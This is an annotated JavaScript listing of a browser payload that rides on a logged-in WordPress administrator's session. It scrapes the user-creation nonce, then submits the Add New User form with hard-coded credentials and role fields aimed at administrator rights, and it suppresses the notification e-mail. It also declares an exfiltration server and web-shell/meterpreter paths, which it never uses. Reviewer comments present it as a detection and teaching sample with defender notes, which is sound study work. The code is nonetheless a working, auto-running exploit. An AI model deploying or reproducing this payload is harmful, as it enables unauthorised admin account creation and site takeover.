// NOTE(review): this listing is a browser-side payload that rides on an
// already-authenticated WordPress admin session to create a new user
// account (a same-origin, nonce-scraping request forgery). It is kept as a
// detection / teaching sample: the comments below describe only what the
// visible code does and where a defender would observe it. The original
// file was pasted with its line breaks lost; they are restored here, and
// no code token has been changed.

// Remote endpoint the original author intended for collecting data by
// requesting a non-existent ".js" file there, so the payload shows up in
// that host's 404 log. Nothing in this listing references the variable,
// so from a reader's point of view it is dead configuration. The value is
// a page-specific private IP/port, not a reusable indicator.
var httpExfilServer = "http://192.168.78.135:8888";

// Relative paths to PHP files the author expects to be dropped by a
// separate "add plugin" routine that is not part of this listing (the
// original comment says that routine rewrites the directory name).
// Neither variable is referenced in the visible code.
var webShellPath = "shell/shell.php";
var phpMetShellPath = "shell/meterpreter.php";

/**
 * Promise-based delay helper. Defined but never called in this listing.
 * @param {number} milliseconds - delay before the returned promise resolves
 * @returns {Promise<void>}
 */
const sleep = (milliseconds) => {
  return new Promise(resolve => setTimeout(resolve, milliseconds))
}

/**
 * Returns the payload of a completed XMLHttpRequest in the form that
 * matches its responseType: unset/"text" -> responseText,
 * "document" -> responseXML, "json" -> responseJSON, anything else ->
 * response.
 *
 * NOTE(review): `responseJSON` is not a property of the standard XHR
 * object (it exists on jQuery's jqXHR wrapper), so the "json" branch most
 * likely yields undefined on a native XMLHttpRequest. The caller below only
 * ever uses the default "text" path.
 * @param {XMLHttpRequest} xhr - a request whose readyState is DONE
 * @returns {*} the response body in the type-appropriate representation
 */
function read_body(xhr) {
  var data;
  if (!xhr.responseType || xhr.responseType === "text") {
    data = xhr.responseText;
  } else if (xhr.responseType === "document") {
    data = xhr.responseXML;
  } else if (xhr.responseType === "json") {
    data = xhr.responseJSON;
  } else {
    data = xhr.response;
  }
  return data;
}

/**
 * Creates a WordPress user by replaying the "Add New User" admin form with
 * the victim's own session: a GET to /wp-admin/user-new.php fetches the
 * page, the `_wpnonce_create-user` CSRF token is scraped out of the HTML at
 * a fixed offset, and a form-encoded POST to the same path submits
 * hard-coded credentials plus role fields.
 *
 * Defender notes, all grounded in the code below:
 *  - Both requests are same-origin and carry the victim's cookies, so the
 *    web server access log shows a GET immediately followed by a POST to
 *    /wp-admin/user-new.php from a page the victim had open; the POST
 *    carries a hard-coded `_wp_http_referer` of /wp-admin/user-new.php.
 *  - The created account has a fixed login ("novouser"), e-mail and
 *    display name, which a new-user audit alert or a periodic diff of the
 *    users table will surface.
 *  - `alert("loaded")` and the console.log calls make the payload visibly
 *    noisy to the victim; a browser that blocks the inline script, or a
 *    server-side check that the admin page was actually rendered with the
 *    expected nonce marker, stops it.
 *
 * No parameters; returns undefined. Network activity is asynchronous and
 * errors are not handled anywhere.
 */
function addAdminUser() {
  var uri = "/wp-admin/user-new.php";
  // Hard-coded credentials for the account to be created. The original
  // author's comment said the user ends up with Administrator rights; the
  // role fields in the POST body below are where that is attempted.
  var username = "novouser";
  var email = "teste@teste.com"
  var firstName = "trevor";
  var lastName = "roach";
  var password = "PasswordStrongEnought";
  // `xhr` is assigned without var/let/const, so it becomes an implicit
  // global (the file has no 'use strict'); the handler below reassigns it.
  xhr = new XMLHttpRequest();
  xhr.open("GET", uri, true);
  xhr.send(null);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      var response = read_body(xhr);
      // Fixed-offset scrape of the CSRF nonce: 35 is the length of the
      // marker string below, and the following 10 characters are taken as
      // the token. There is no check for noncePos === -1, so a page that
      // lacks the marker still produces a POST, just with a garbage nonce
      // that the server should reject — the attempt is logged either way.
      var noncePos = response.indexOf('name="_wpnonce_create-user" value="');
      var nonceVal = response.substring(noncePos+35, noncePos+45);
      // Second request: replay the Add New User form. This overwrites the
      // global `xhr`, so any later firing of this handler reads the new
      // object's readyState rather than the original GET's.
      xhr = new XMLHttpRequest();
      xhr.open("POST", uri);
      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      // Body mirrors the field names of the WordPress user-new.php form.
      // Several statements below omit the trailing semicolon and rely on
      // automatic semicolon insertion at the line break.
      var body = "action=createuser&"
      body += "_wpnonce_create-user=" + nonceVal + "&";
      body += "_wp_http_referer=%2Fwp-admin%2Fuser-new.php&"
      body += "user_login=" + username
        + "&";
      body += "email=" + email + "&";
      body += "first_name=" + firstName + "&";
      body += "last_name=" + lastName + "&";
      body += "uri=&";
      body += "pass1=" + password + "&";
      body += "pass1-text=" + password + "&";
      body += "pass2=" + password + "&";
      // pw_weak=on acknowledges WordPress's weak-password confirmation
      // checkbox; send_user_notification=0 suppresses the welcome e-mail
      // that would otherwise alert the new "user".
      body += "pw_weak=on&";
      body += "send_user_notification=0&";
      // The core WordPress field is `role`, set here to subscriber. The
      // `ure_*` fields are not core WordPress form fields; they appear to
      // target the extra role checkboxes of a role-editor plugin —
      // unverified from this listing. Sites without such a plugin would
      // ignore them and create a subscriber.
      body += "role=subscriber&";
      body += "ure_select_other_roles=administrator&";
      body += "ure_other_roles=administrator&";
      body += "createuser=Add+New+User";
      xhr.send(body);
      console.log("test inner")
    }
    console.log("text outer")
  }
  console.log("LOADED");
  alert("loaded");
}

// Runs immediately on load; there is no trigger condition or delay.
addAdminUser();